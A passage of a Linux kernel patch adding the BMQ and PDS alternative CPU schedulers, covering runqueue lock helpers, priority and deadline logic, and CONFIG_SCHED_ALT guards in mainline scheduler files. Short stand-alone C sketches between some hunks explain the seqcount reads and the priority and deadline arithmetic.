-+	return READ_ONCE(rq->clock);
-+}
-+
-+static inline u64 rq_clock(struct rq *rq)
-+{
-+	/*
-+	 * Relax the lockdep_assert_held() check: as in VRQ, a caller of
-+	 * sched_info_xxxx() may not hold rq->lock, so keep it commented out:
-+	 * lockdep_assert_held(&rq->lock);
-+	 */
-+	return rq->clock;
-+}
-+
-+static inline u64 rq_clock_task(struct rq *rq)
-+{
-+	/*
-+	 * Relax the lockdep_assert_held() check: as in VRQ, a caller of
-+	 * sched_info_xxxx() may not hold rq->lock, so keep it commented out:
-+	 * lockdep_assert_held(&rq->lock);
-+	 */
-+	return rq->clock_task;
-+}
-+
-+/*
-+ * {de,en}queue flags:
-+ *
-+ * DEQUEUE_SLEEP  - task is no longer runnable
-+ * ENQUEUE_WAKEUP - task just became runnable
-+ *
-+ */
-+
-+#define DEQUEUE_SLEEP		0x01
-+
-+#define ENQUEUE_WAKEUP		0x01
-+
-+
-+/*
-+ * Below are scheduler APIs used by other kernel code.
-+ * They take a dummy rq_flags argument.
-+ * TODO: BMQ needs to support these APIs for compatibility with mainline
-+ * scheduler code.
-+ */
-+struct rq_flags {
-+	unsigned long flags;
-+};
-+
-+struct rq *__task_rq_lock(struct task_struct *p, struct rq_flags *rf)
-+	__acquires(rq->lock);
-+
-+struct rq *task_rq_lock(struct task_struct *p, struct rq_flags *rf)
-+	__acquires(p->pi_lock)
-+	__acquires(rq->lock);
-+
-+static inline void __task_rq_unlock(struct rq *rq, struct rq_flags *rf)
-+	__releases(rq->lock)
-+{
-+	raw_spin_unlock(&rq->lock);
-+}
-+
-+static inline void
-+task_rq_unlock(struct rq *rq, struct task_struct *p, struct rq_flags *rf)
-+	__releases(rq->lock)
-+	__releases(p->pi_lock)
-+{
-+	raw_spin_unlock(&rq->lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, rf->flags);
-+}
-+
-+static inline void
-+rq_lock(struct rq *rq, struct rq_flags *rf)
-+	__acquires(rq->lock)
-+{
-+	raw_spin_lock(&rq->lock);
-+}
-+
-+static inline void
-+rq_unlock(struct rq *rq, struct rq_flags *rf)
-+	__releases(rq->lock)
-+{
-+	raw_spin_unlock(&rq->lock);
-+}
-+
-+static inline void
-+rq_lock_irq(struct rq *rq, struct rq_flags *rf)
-+	__acquires(rq->lock)
-+{
-+	raw_spin_lock_irq(&rq->lock);
-+}
-+
-+static inline void
-+rq_unlock_irq(struct rq *rq, struct rq_flags *rf)
-+	__releases(rq->lock)
-+{
-+	raw_spin_unlock_irq(&rq->lock);
-+}
-+
-+static inline struct rq *
-+this_rq_lock_irq(struct rq_flags *rf)
-+	__acquires(rq->lock)
-+{
-+	struct rq *rq;
-+
-+	local_irq_disable();
-+	rq = this_rq();
-+	raw_spin_lock(&rq->lock);
-+
-+	return rq;
-+}
-+
-+static inline raw_spinlock_t *__rq_lockp(struct rq *rq)
-+{
-+	return &rq->lock;
-+}
-+
-+static inline raw_spinlock_t *rq_lockp(struct rq *rq)
-+{
-+	return __rq_lockp(rq);
-+}
-+
-+static inline void lockdep_assert_rq_held(struct rq *rq)
-+{
-+	lockdep_assert_held(__rq_lockp(rq));
-+}
-+
-+extern void raw_spin_rq_lock_nested(struct rq *rq, int subclass);
-+extern void raw_spin_rq_unlock(struct rq *rq);
-+
-+static inline void raw_spin_rq_lock(struct rq *rq)
-+{
-+	raw_spin_rq_lock_nested(rq, 0);
-+}
-+
-+static inline void raw_spin_rq_lock_irq(struct rq *rq)
-+{
-+	local_irq_disable();
-+	raw_spin_rq_lock(rq);
-+}
-+
-+static inline void raw_spin_rq_unlock_irq(struct rq *rq)
-+{
-+	raw_spin_rq_unlock(rq);
-+	local_irq_enable();
-+}
-+
-+static inline int task_current(struct rq *rq, struct task_struct *p)
-+{
-+	return rq->curr == p;
-+}
-+
-+static inline bool task_on_cpu(struct task_struct *p)
-+{
-+	return p->on_cpu;
-+}
-+
-+extern int task_running_nice(struct task_struct *p);
-+
-+extern struct static_key_false sched_schedstats;
-+
-+#ifdef CONFIG_CPU_IDLE
-+static inline void idle_set_state(struct rq *rq,
-+				  struct cpuidle_state *idle_state)
-+{
-+	rq->idle_state = idle_state;
-+}
-+
-+static inline struct cpuidle_state *idle_get_state(struct rq *rq)
-+{
-+	WARN_ON(!rcu_read_lock_held());
-+	return rq->idle_state;
-+}
-+#else
-+static inline void idle_set_state(struct rq *rq,
-+				  struct cpuidle_state *idle_state)
-+{
-+}
-+
-+static inline struct cpuidle_state *idle_get_state(struct rq *rq)
-+{
-+	return NULL;
-+}
-+#endif
-+
-+static inline int cpu_of(const struct rq *rq)
-+{
-+#ifdef CONFIG_SMP
-+	return rq->cpu;
-+#else
-+	return 0;
-+#endif
-+}
-+
-+#include "stats.h"
-+
-+#ifdef CONFIG_NO_HZ_COMMON
-+#define NOHZ_BALANCE_KICK_BIT	0
-+#define NOHZ_STATS_KICK_BIT	1
-+
-+#define NOHZ_BALANCE_KICK	BIT(NOHZ_BALANCE_KICK_BIT)
-+#define NOHZ_STATS_KICK		BIT(NOHZ_STATS_KICK_BIT)
-+
-+#define NOHZ_KICK_MASK	(NOHZ_BALANCE_KICK | NOHZ_STATS_KICK)
-+
-+#define nohz_flags(cpu)	(&cpu_rq(cpu)->nohz_flags)
-+
-+/* TODO: needed?
-+extern void nohz_balance_exit_idle(struct rq *rq);
-+#else
-+static inline void nohz_balance_exit_idle(struct rq *rq) { }
-+*/
-+#endif
-+
-+#ifdef CONFIG_IRQ_TIME_ACCOUNTING
-+struct irqtime {
-+	u64			total;
-+	u64			tick_delta;
-+	u64			irq_start_time;
-+	struct u64_stats_sync	sync;
-+};
-+
-+DECLARE_PER_CPU(struct irqtime, cpu_irqtime);
-+
-+/*
-+ * Returns the irqtime minus the softirq time computed by ksoftirqd.
-+ * Otherwise ksoftirqd's sum_exec_runtime would have its own runtime
-+ * subtracted and would never move forward.
-+ */
-+static inline u64 irq_time_read(int cpu)
-+{
-+	struct irqtime *irqtime = &per_cpu(cpu_irqtime, cpu);
-+	unsigned int seq;
-+	u64 total;
-+
-+	do {
-+		seq = __u64_stats_fetch_begin(&irqtime->sync);
-+		total = irqtime->total;
-+	} while (__u64_stats_fetch_retry(&irqtime->sync, seq));
-+
-+	return total;
-+}
-+#endif /* CONFIG_IRQ_TIME_ACCOUNTING */
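
irq_time_read() above is the standard seqcount read side: sample the sequence, copy the value, and retry if a writer moved the sequence in between. A stand-alone sketch of that retry shape with C11 atomics (shape only; the kernel's u64_stats_sync helpers carry the full fence and 32-bit discipline):

#include <stdatomic.h>
#include <stdint.h>
#include <stdio.h>

/* minimal seqcount-protected 64-bit value, modelled on irq_time_read() */
struct seq_u64 {
	_Atomic unsigned int seq;	/* odd while a writer is mid-update */
	uint64_t val;
};

static uint64_t seq_read(struct seq_u64 *s)
{
	unsigned int seq;
	uint64_t v;

	do {
		seq = atomic_load_explicit(&s->seq, memory_order_acquire);
		v = s->val;
	} while ((seq & 1) ||
		 atomic_load_explicit(&s->seq, memory_order_acquire) != seq);

	return v;		/* a consistent snapshot of val */
}

int main(void)
{
	struct seq_u64 s = { .seq = 0, .val = 42 };

	printf("%llu\n", (unsigned long long)seq_read(&s));
	return 0;
}
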
-+
-+#ifdef CONFIG_CPU_FREQ
-+DECLARE_PER_CPU(struct update_util_data __rcu *, cpufreq_update_util_data);
-+#endif /* CONFIG_CPU_FREQ */
-+
-+#ifdef CONFIG_NO_HZ_FULL
-+extern int __init sched_tick_offload_init(void);
-+#else
-+static inline int sched_tick_offload_init(void) { return 0; }
-+#endif
-+
-+#ifdef arch_scale_freq_capacity
-+#ifndef arch_scale_freq_invariant
-+#define arch_scale_freq_invariant()	(true)
-+#endif
-+#else /* arch_scale_freq_capacity */
-+#define arch_scale_freq_invariant()	(false)
-+#endif
-+
-+extern void schedule_idle(void);
-+
-+#define cap_scale(v, s) ((v)*(s) >> SCHED_CAPACITY_SHIFT)
-+
-+/*
-+ * !! For sched_setattr_nocheck() (kernel) only !!
-+ *
-+ * This is actually gross. :(
-+ *
-+ * It is used to make schedutil kworker(s) higher priority than SCHED_DEADLINE
-+ * tasks, but still be able to sleep. We need this on platforms that cannot
-+ * atomically change clock frequency. Remove once fast switching will be
-+ * available on such platforms.
-+ *
-+ * SUGOV stands for SchedUtil GOVernor.
-+ */
-+#define SCHED_FLAG_SUGOV	0x10000000
-+
-+#ifdef CONFIG_MEMBARRIER
-+/*
-+ * The scheduler provides memory barriers required by membarrier between:
-+ * - prior user-space memory accesses and store to rq->membarrier_state,
-+ * - store to rq->membarrier_state and following user-space memory accesses.
-+ * In the same way it provides those guarantees around store to rq->curr.
-+ */
-+static inline void membarrier_switch_mm(struct rq *rq,
-+					struct mm_struct *prev_mm,
-+					struct mm_struct *next_mm)
-+{
-+	int membarrier_state;
-+
-+	if (prev_mm == next_mm)
-+		return;
-+
-+	membarrier_state = atomic_read(&next_mm->membarrier_state);
-+	if (READ_ONCE(rq->membarrier_state) == membarrier_state)
-+		return;
-+
-+	WRITE_ONCE(rq->membarrier_state, membarrier_state);
-+}
-+#else
-+static inline void membarrier_switch_mm(struct rq *rq,
-+					struct mm_struct *prev_mm,
-+					struct mm_struct *next_mm)
-+{
-+}
-+#endif
-+
-+#ifdef CONFIG_NUMA
-+extern int sched_numa_find_closest(const struct cpumask *cpus, int cpu);
-+#else
-+static inline int sched_numa_find_closest(const struct cpumask *cpus, int cpu)
-+{
-+	return nr_cpu_ids;
-+}
-+#endif
-+
-+extern void swake_up_all_locked(struct swait_queue_head *q);
-+extern void __prepare_to_swait(struct swait_queue_head *q, struct swait_queue *wait);
-+
-+#ifdef CONFIG_PREEMPT_DYNAMIC
-+extern int preempt_dynamic_mode;
-+extern int sched_dynamic_mode(const char *str);
-+extern void sched_dynamic_update(int mode);
-+#endif
-+
-+static inline void nohz_run_idle_balance(int cpu) { }
-+
-+static inline
-+unsigned long uclamp_rq_util_with(struct rq *rq, unsigned long util,
-+				  struct task_struct *p)
-+{
-+	return util;
-+}
-+
-+static inline bool uclamp_rq_is_capped(struct rq *rq) { return false; }
-+
-+#endif /* ALT_SCHED_H */
-diff --git a/kernel/sched/bmq.h b/kernel/sched/bmq.h
-new file mode 100644
-index 000000000000..66b77291b9d0
---- /dev/null
-+++ b/kernel/sched/bmq.h
-@@ -0,0 +1,110 @@
-+#define ALT_SCHED_VERSION_MSG "sched/bmq: BMQ CPU Scheduler "ALT_SCHED_VERSION" by Alfred Chen.\n"
-+
-+/*
-+ * BMQ only routines
-+ */
-+#define rq_switch_time(rq)	((rq)->clock - (rq)->last_ts_switch)
-+#define boost_threshold(p)	(sched_timeslice_ns >>\
-+				 (15 - MAX_PRIORITY_ADJ - (p)->boost_prio))
-+
-+static inline void boost_task(struct task_struct *p)
-+{
-+	int limit;
-+
-+	switch (p->policy) {
-+	case SCHED_NORMAL:
-+		limit = -MAX_PRIORITY_ADJ;
-+		break;
-+	case SCHED_BATCH:
-+	case SCHED_IDLE:
-+		limit = 0;
-+		break;
-+	default:
-+		return;
-+	}
-+
-+	if (p->boost_prio > limit)
-+		p->boost_prio--;
-+}
-+
-+static inline void deboost_task(struct task_struct *p)
-+{
-+	if (p->boost_prio < MAX_PRIORITY_ADJ)
-+		p->boost_prio++;
-+}
-+
-+/*
-+ * Common interfaces
-+ */
-+static inline void sched_timeslice_imp(const int timeslice_ms) {}
-+
-+static inline int
-+task_sched_prio_normal(const struct task_struct *p, const struct rq *rq)
-+{
-+	return p->prio + p->boost_prio - MAX_RT_PRIO;
-+}
-+
-+static inline int task_sched_prio(const struct task_struct *p)
-+{
-+	return (p->prio < MAX_RT_PRIO) ? p->prio :
-+		MAX_RT_PRIO / 2 + (p->prio + p->boost_prio) / 2;
-+}
-+
-+static inline int
-+task_sched_prio_idx(const struct task_struct *p, const struct rq *rq)
-+{
-+	return task_sched_prio(p);
-+}
-+
-+static inline int sched_prio2idx(int prio, struct rq *rq)
-+{
-+	return prio;
-+}
-+
-+static inline int sched_idx2prio(int idx, struct rq *rq)
-+{
-+	return idx;
-+}
-+
-+static inline void time_slice_expired(struct task_struct *p, struct rq *rq)
-+{
-+	p->time_slice = sched_timeslice_ns;
-+
-+	if (SCHED_FIFO != p->policy && task_on_rq_queued(p)) {
-+		if (SCHED_RR != p->policy)
-+			deboost_task(p);
-+		requeue_task(p, rq, task_sched_prio_idx(p, rq));
-+	}
-+}
-+
-+static inline void sched_task_sanity_check(struct task_struct *p, struct rq *rq) {}
-+
-+inline int task_running_nice(struct task_struct *p)
-+{
-+	return (p->prio + p->boost_prio > DEFAULT_PRIO + MAX_PRIORITY_ADJ);
-+}
-+
-+static void sched_task_fork(struct task_struct *p, struct rq *rq)
-+{
-+	p->boost_prio = MAX_PRIORITY_ADJ;
-+}
-+
-+static inline void do_sched_yield_type_1(struct task_struct *p, struct rq *rq)
-+{
-+	p->boost_prio = MAX_PRIORITY_ADJ;
-+}
-+
-+#ifdef CONFIG_SMP
-+static inline void sched_task_ttwu(struct task_struct *p)
-+{
-+	if (this_rq()->clock_task - p->last_ran > sched_timeslice_ns)
-+		boost_task(p);
-+}
-+#endif
-+
-+static inline void sched_task_deactivate(struct task_struct *p, struct rq *rq)
-+{
-+	if (rq_switch_time(rq) < boost_threshold(p))
-+		boost_task(p);
-+}
-+
-+static inline void update_rq_time_edge(struct rq *rq) {}
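
task_sched_prio() above folds the 40 non-RT priority levels in half, so normal tasks land on 20 queue slots just above the RT range, and boost_prio shifts a task a couple of slots up or down. A worked sketch of that arithmetic (MAX_RT_PRIO is the mainline 100; the boost range of +/-4 is an assumption for illustration, the real MAX_PRIORITY_ADJ is defined elsewhere in the patch):

#include <stdio.h>

#define MAX_RT_PRIO	100	/* mainline value */

/* same fold as task_sched_prio() above for non-RT tasks */
static int task_sched_prio(int prio, int boost_prio)
{
	return (prio < MAX_RT_PRIO) ? prio :
		MAX_RT_PRIO / 2 + (prio + boost_prio) / 2;
}

int main(void)
{
	/* nice 0 => prio 120; assume a boost range of -4..+4 */
	for (int b = -4; b <= 4; b++)
		printf("boost_prio %+d -> queue index %d\n",
		       b, task_sched_prio(120, b));
	return 0;	/* indices run from 108 (boosted) to 112 (deboosted) */
}
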
-diff --git a/kernel/sched/build_policy.c b/kernel/sched/build_policy.c
-index d9dc9ab3773f..71a25540d65e 100644
---- a/kernel/sched/build_policy.c
-+++ b/kernel/sched/build_policy.c
-@@ -42,13 +42,19 @@
- 
- #include "idle.c"
- 
-+#ifndef CONFIG_SCHED_ALT
- #include "rt.c"
-+#endif
- 
- #ifdef CONFIG_SMP
-+#ifndef CONFIG_SCHED_ALT
- # include "cpudeadline.c"
-+#endif
- # include "pelt.c"
- #endif
- 
- #include "cputime.c"
--#include "deadline.c"
- 
-+#ifndef CONFIG_SCHED_ALT
-+#include "deadline.c"
-+#endif
-diff --git a/kernel/sched/build_utility.c b/kernel/sched/build_utility.c
-index 99bdd96f454f..23f80a86d2d7 100644
---- a/kernel/sched/build_utility.c
-+++ b/kernel/sched/build_utility.c
-@@ -85,7 +85,9 @@
- 
- #ifdef CONFIG_SMP
- # include "cpupri.c"
-+#ifndef CONFIG_SCHED_ALT
- # include "stop_task.c"
-+#endif
- # include "topology.c"
- #endif
- 
-diff --git a/kernel/sched/cpufreq_schedutil.c b/kernel/sched/cpufreq_schedutil.c
-index 1207c78f85c1..68812e0756cb 100644
---- a/kernel/sched/cpufreq_schedutil.c
-+++ b/kernel/sched/cpufreq_schedutil.c
-@@ -159,9 +159,14 @@ static void sugov_get_util(struct sugov_cpu *sg_cpu)
- 	struct rq *rq = cpu_rq(sg_cpu->cpu);
- 
- 	sg_cpu->max = arch_scale_cpu_capacity(sg_cpu->cpu);
-+#ifndef CONFIG_SCHED_ALT
- 	sg_cpu->bw_dl = cpu_bw_dl(rq);
- 	sg_cpu->util = effective_cpu_util(sg_cpu->cpu, cpu_util_cfs(sg_cpu->cpu),
- 					  FREQUENCY_UTIL, NULL);
-+#else
-+	sg_cpu->bw_dl = 0;
-+	sg_cpu->util = rq_load_util(rq, sg_cpu->max);
-+#endif /* CONFIG_SCHED_ALT */
- }
- 
- /**
-@@ -305,8 +310,10 @@ static inline bool sugov_cpu_is_busy(struct sugov_cpu *sg_cpu) { return false; }
-  */
- static inline void ignore_dl_rate_limit(struct sugov_cpu *sg_cpu)
- {
-+#ifndef CONFIG_SCHED_ALT
- 	if (cpu_bw_dl(cpu_rq(sg_cpu->cpu)) > sg_cpu->bw_dl)
- 		sg_cpu->sg_policy->limits_changed = true;
-+#endif
- }
- 
- static inline bool sugov_update_single_common(struct sugov_cpu *sg_cpu,
-@@ -606,6 +613,7 @@ static int sugov_kthread_create(struct sugov_policy *sg_policy)
- 	}
- 
- 	ret = sched_setattr_nocheck(thread, &attr);
-+
- 	if (ret) {
- 		kthread_stop(thread);
- 		pr_warn("%s: failed to set SCHED_DEADLINE\n", __func__);
-@@ -838,7 +846,9 @@ cpufreq_governor_init(schedutil_gov);
- #ifdef CONFIG_ENERGY_MODEL
- static void rebuild_sd_workfn(struct work_struct *work)
- {
-+#ifndef CONFIG_SCHED_ALT
- 	rebuild_sched_domains_energy();
-+#endif /* CONFIG_SCHED_ALT */
- }
- static DECLARE_WORK(rebuild_sd_work, rebuild_sd_workfn);
- 
-diff --git a/kernel/sched/cputime.c b/kernel/sched/cputime.c
-index 95fc77853743..b48b3f9ed47f 100644
---- a/kernel/sched/cputime.c
-+++ b/kernel/sched/cputime.c
-@@ -122,7 +122,7 @@ void account_user_time(struct task_struct *p, u64 cputime)
- 	p->utime += cputime;
- 	account_group_user_time(p, cputime);
- 
--	index = (task_nice(p) > 0) ? CPUTIME_NICE : CPUTIME_USER;
-+	index = task_running_nice(p) ? CPUTIME_NICE : CPUTIME_USER;
- 
- 	/* Add user time to cpustat. */
- 	task_group_account_field(p, index, cputime);
-@@ -146,7 +146,7 @@ void account_guest_time(struct task_struct *p, u64 cputime)
- 	p->gtime += cputime;
- 
- 	/* Add guest time to cpustat. */
--	if (task_nice(p) > 0) {
-+	if (task_running_nice(p)) {
- 		task_group_account_field(p, CPUTIME_NICE, cputime);
- 		cpustat[CPUTIME_GUEST_NICE] += cputime;
- 	} else {
-@@ -284,7 +284,7 @@ static inline u64 account_other_time(u64 max)
- #ifdef CONFIG_64BIT
- static inline u64 read_sum_exec_runtime(struct task_struct *t)
- {
--	return t->se.sum_exec_runtime;
-+	return tsk_seruntime(t);
- }
- #else
- static u64 read_sum_exec_runtime(struct task_struct *t)
-@@ -294,7 +294,7 @@ static u64 read_sum_exec_runtime(struct task_struct *t)
- 	struct rq *rq;
- 
- 	rq = task_rq_lock(t, &rf);
--	ns = t->se.sum_exec_runtime;
-+	ns = tsk_seruntime(t);
- 	task_rq_unlock(rq, t, &rf);
- 
- 	return ns;
-@@ -626,7 +626,7 @@ void cputime_adjust(struct task_cputime *curr, struct prev_cputime *prev,
- void task_cputime_adjusted(struct task_struct *p, u64 *ut, u64 *st)
- {
- 	struct task_cputime cputime = {
--		.sum_exec_runtime = p->se.sum_exec_runtime,
-+		.sum_exec_runtime = tsk_seruntime(p),
- 	};
- 
- 	if (task_cputime(p, &cputime.utime, &cputime.stime))
-diff --git a/kernel/sched/debug.c b/kernel/sched/debug.c
-index 1637b65ba07a..033c6deeb515 100644
---- a/kernel/sched/debug.c
-+++ b/kernel/sched/debug.c
-@@ -7,6 +7,7 @@
-  * Copyright(C) 2007, Red Hat, Inc., Ingo Molnar
-  */
- 
-+#ifndef CONFIG_SCHED_ALT
- /*
-  * This allows printing both to /proc/sched_debug and
-  * to the console
-@@ -215,6 +216,7 @@ static const struct file_operations sched_scaling_fops = {
- };
- 
- #endif /* SMP */
-+#endif /* !CONFIG_SCHED_ALT */
- 
- #ifdef CONFIG_PREEMPT_DYNAMIC
- 
-@@ -278,6 +280,7 @@ static const struct file_operations sched_dynamic_fops = {
- 
- #endif /* CONFIG_PREEMPT_DYNAMIC */
- 
-+#ifndef CONFIG_SCHED_ALT
- __read_mostly bool sched_debug_verbose;
- 
- static const struct seq_operations sched_debug_sops;
-@@ -293,6 +296,7 @@ static const struct file_operations sched_debug_fops = {
- 	.llseek		= seq_lseek,
- 	.release	= seq_release,
- };
-+#endif /* !CONFIG_SCHED_ALT */
- 
- static struct dentry *debugfs_sched;
- 
-@@ -302,12 +306,15 @@ static __init int sched_init_debug(void)
- 
- 	debugfs_sched = debugfs_create_dir("sched", NULL);
- 
-+#ifndef CONFIG_SCHED_ALT
- 	debugfs_create_file("features", 0644, debugfs_sched, NULL, &sched_feat_fops);
- 	debugfs_create_bool("verbose", 0644, debugfs_sched, &sched_debug_verbose);
-+#endif /* !CONFIG_SCHED_ALT */
- #ifdef CONFIG_PREEMPT_DYNAMIC
- 	debugfs_create_file("preempt", 0644, debugfs_sched, NULL, &sched_dynamic_fops);
- #endif
- 
-+#ifndef CONFIG_SCHED_ALT
- 	debugfs_create_u32("latency_ns", 0644, debugfs_sched, &sysctl_sched_latency);
- 	debugfs_create_u32("min_granularity_ns", 0644, debugfs_sched, &sysctl_sched_min_granularity);
- 	debugfs_create_u32("idle_min_granularity_ns", 0644, debugfs_sched, &sysctl_sched_idle_min_granularity);
-@@ -337,11 +344,13 @@ static __init int sched_init_debug(void)
- #endif
- 
- 	debugfs_create_file("debug", 0444, debugfs_sched, NULL, &sched_debug_fops);
-+#endif /* !CONFIG_SCHED_ALT */
- 
- 	return 0;
- }
- late_initcall(sched_init_debug);
- 
-+#ifndef CONFIG_SCHED_ALT
- #ifdef CONFIG_SMP
- 
- static cpumask_var_t		sd_sysctl_cpus;
-@@ -1068,6 +1077,7 @@ void proc_sched_set_task(struct task_struct *p)
- 	memset(&p->stats, 0, sizeof(p->stats));
- #endif
- }
-+#endif /* !CONFIG_SCHED_ALT */
- 
- void resched_latency_warn(int cpu, u64 latency)
- {
-diff --git a/kernel/sched/idle.c b/kernel/sched/idle.c
-index f26ab2675f7d..480d4ad16d45 100644
---- a/kernel/sched/idle.c
-+++ b/kernel/sched/idle.c
-@@ -400,6 +400,7 @@ void cpu_startup_entry(enum cpuhp_state state)
- 		do_idle();
- }
- 
-+#ifndef CONFIG_SCHED_ALT
- /*
-  * idle-task scheduling class.
-  */
-@@ -521,3 +522,4 @@ DEFINE_SCHED_CLASS(idle) = {
- 	.switched_to		= switched_to_idle,
- 	.update_curr		= update_curr_idle,
- };
-+#endif
-diff --git a/kernel/sched/pds.h b/kernel/sched/pds.h
-new file mode 100644
-index 000000000000..56a649d02e49
---- /dev/null
-+++ b/kernel/sched/pds.h
-@@ -0,0 +1,127 @@
-+#define ALT_SCHED_VERSION_MSG "sched/pds: PDS CPU Scheduler "ALT_SCHED_VERSION" by Alfred Chen.\n"
-+
-+static int sched_timeslice_shift = 22;
-+
-+#define NORMAL_PRIO_MOD(x)	((x) & (NORMAL_PRIO_NUM - 1))
-+
-+/*
-+ * Common interfaces
-+ */
-+static inline void sched_timeslice_imp(const int timeslice_ms)
-+{
-+	if (2 == timeslice_ms)
-+		sched_timeslice_shift = 21;
-+}
-+
-+static inline int
-+task_sched_prio_normal(const struct task_struct *p, const struct rq *rq)
-+{
-+	s64 delta = p->deadline - rq->time_edge + NORMAL_PRIO_NUM - NICE_WIDTH;
-+
-+	if (WARN_ONCE(delta > NORMAL_PRIO_NUM - 1,
-+		      "pds: task_sched_prio_normal() delta %lld\n", delta))
-+		return NORMAL_PRIO_NUM - 1;
-+
-+	return (delta < 0) ? 0 : delta;
-+}
-+
-+static inline int task_sched_prio(const struct task_struct *p)
-+{
-+	return (p->prio < MAX_RT_PRIO) ? p->prio :
-+		MIN_NORMAL_PRIO + task_sched_prio_normal(p, task_rq(p));
-+}
-+
-+static inline int
-+task_sched_prio_idx(const struct task_struct *p, const struct rq *rq)
-+{
-+	return (p->prio < MAX_RT_PRIO) ? p->prio : MIN_NORMAL_PRIO +
-+		NORMAL_PRIO_MOD(task_sched_prio_normal(p, rq) + rq->time_edge);
-+}
-+
-+static inline int sched_prio2idx(int prio, struct rq *rq)
-+{
-+	return (IDLE_TASK_SCHED_PRIO == prio || prio < MAX_RT_PRIO) ? prio :
-+		MIN_NORMAL_PRIO + NORMAL_PRIO_MOD((prio - MIN_NORMAL_PRIO) +
-+						  rq->time_edge);
-+}
-+
-+static inline int sched_idx2prio(int idx, struct rq *rq)
-+{
-+	return (idx < MAX_RT_PRIO) ? idx : MIN_NORMAL_PRIO +
-+		NORMAL_PRIO_MOD((idx - MIN_NORMAL_PRIO) + NORMAL_PRIO_NUM -
-+				NORMAL_PRIO_MOD(rq->time_edge));
-+}
-+
-+static inline void sched_renew_deadline(struct task_struct *p, const struct rq *rq)
-+{
-+	if (p->prio >= MAX_RT_PRIO)
-+		p->deadline = (rq->clock >> sched_timeslice_shift) +
-+			p->static_prio - (MAX_PRIO - NICE_WIDTH);
-+}
-+
-+int task_running_nice(struct task_struct *p)
-+{
-+	return (p->prio > DEFAULT_PRIO);
-+}
-+
-+static inline void update_rq_time_edge(struct rq *rq)
-+{
-+	struct list_head head;
-+	u64 old = rq->time_edge;
-+	u64 now = rq->clock >> sched_timeslice_shift;
-+	u64 prio, delta;
-+
-+	if (now == old)
-+		return;
-+
-+	delta = min_t(u64, NORMAL_PRIO_NUM, now - old);
-+	INIT_LIST_HEAD(&head);
-+
-+	for_each_set_bit(prio, &rq->queue.bitmap[2], delta)
-+		list_splice_tail_init(rq->queue.heads + MIN_NORMAL_PRIO +
-+				      NORMAL_PRIO_MOD(prio + old), &head);
-+
-+	rq->queue.bitmap[2] = (NORMAL_PRIO_NUM == delta) ? 0UL :
-+		rq->queue.bitmap[2] >> delta;
-+	rq->time_edge = now;
-+	if (!list_empty(&head)) {
-+		u64 idx = MIN_NORMAL_PRIO + NORMAL_PRIO_MOD(now);
-+		struct task_struct *p;
-+
-+		list_for_each_entry(p, &head, sq_node)
-+			p->sq_idx = idx;
-+
-+		list_splice(&head, rq->queue.heads + idx);
-+		rq->queue.bitmap[2] |= 1UL;
-+	}
-+}
-+
-+static inline void time_slice_expired(struct task_struct *p, struct rq *rq)
-+{
-+	p->time_slice = sched_timeslice_ns;
-+	sched_renew_deadline(p, rq);
-+	if (SCHED_FIFO != p->policy && task_on_rq_queued(p))
-+		requeue_task(p, rq, task_sched_prio_idx(p, rq));
-+}
-+
-+static inline void sched_task_sanity_check(struct task_struct *p, struct rq *rq)
-+{
-+	u64 max_dl = rq->time_edge + NICE_WIDTH - 1;
-+	if (unlikely(p->deadline > max_dl))
-+		p->deadline = max_dl;
-+}
-+
-+static void sched_task_fork(struct task_struct *p, struct rq *rq)
-+{
-+	sched_renew_deadline(p, rq);
-+}
-+
-+static inline void do_sched_yield_type_1(struct task_struct *p, struct rq *rq)
-+{
-+	time_slice_expired(p, rq);
-+}
-+
-+#ifdef CONFIG_SMP
-+static inline void sched_task_ttwu(struct task_struct *p) {}
-+#endif
-+static inline void sched_task_deactivate(struct task_struct *p, struct rq *rq) {}
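
sched_renew_deadline() above is the core of PDS: a task's deadline is rq->clock in roughly 4 ms "edge" units (2^22 ns, or 2^21 for a 2 ms timeslice per sched_timeslice_imp()) plus an offset that grows with nice level, and task_sched_prio_normal() then ranks tasks by how far that deadline lies past rq->time_edge. A worked sketch under the mainline constants MAX_PRIO = 140 and NICE_WIDTH = 40 from include/linux/sched/prio.h:

#include <stdint.h>
#include <stdio.h>

#define MAX_PRIO	140	/* mainline value */
#define NICE_WIDTH	 40	/* mainline value */

int main(void)
{
	int shift = 22;			/* 2^22 ns, ~4.19 ms per edge tick */
	uint64_t clock_ns = 1000000000;	/* rq->clock of 1 s, for example */

	uint64_t time_edge = clock_ns >> shift;		/* 238 */

	/* sched_renew_deadline(): nice 0 (static_prio 120) => +20 ticks */
	uint64_t deadline = time_edge + 120 - (MAX_PRIO - NICE_WIDTH);

	printf("time_edge %llu, deadline %llu (~%llu ms ahead)\n",
	       (unsigned long long)time_edge,
	       (unsigned long long)deadline,
	       (unsigned long long)((deadline - time_edge) << shift) / 1000000ULL);
	return 0;
}
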
-diff --git a/kernel/sched/pelt.c b/kernel/sched/pelt.c
-index 0f310768260c..bd38bf738fe9 100644
---- a/kernel/sched/pelt.c
-+++ b/kernel/sched/pelt.c
-@@ -266,6 +266,7 @@ ___update_load_avg(struct sched_avg *sa, unsigned long load)
- 	WRITE_ONCE(sa->util_avg, sa->util_sum / divider);
- }
- 
-+#ifndef CONFIG_SCHED_ALT
- /*
-  * sched_entity:
-  *
-@@ -383,8 +384,9 @@ int update_dl_rq_load_avg(u64 now, struct rq *rq, int running)
- 
- 	return 0;
- }
-+#endif
- 
--#ifdef CONFIG_SCHED_THERMAL_PRESSURE
-+#if defined(CONFIG_SCHED_THERMAL_PRESSURE) && !defined(CONFIG_SCHED_ALT)
- /*
-  * thermal:
-  *
-diff --git a/kernel/sched/pelt.h b/kernel/sched/pelt.h
-index 3a0e0dc28721..e8a7d84aa5a5 100644
---- a/kernel/sched/pelt.h
-+++ b/kernel/sched/pelt.h
-@@ -1,13 +1,15 @@
- #ifdef CONFIG_SMP
- #include "sched-pelt.h"
- 
-+#ifndef CONFIG_SCHED_ALT
- int __update_load_avg_blocked_se(u64 now, struct sched_entity *se);
- int __update_load_avg_se(u64 now, struct cfs_rq *cfs_rq, struct sched_entity *se);
- int __update_load_avg_cfs_rq(u64 now, struct cfs_rq *cfs_rq);
- int update_rt_rq_load_avg(u64 now, struct rq *rq, int running);
- int update_dl_rq_load_avg(u64 now, struct rq *rq, int running);
-+#endif
- 
--#ifdef CONFIG_SCHED_THERMAL_PRESSURE
-+#if defined(CONFIG_SCHED_THERMAL_PRESSURE) && !defined(CONFIG_SCHED_ALT)
- int update_thermal_load_avg(u64 now, struct rq *rq, u64 capacity);
- 
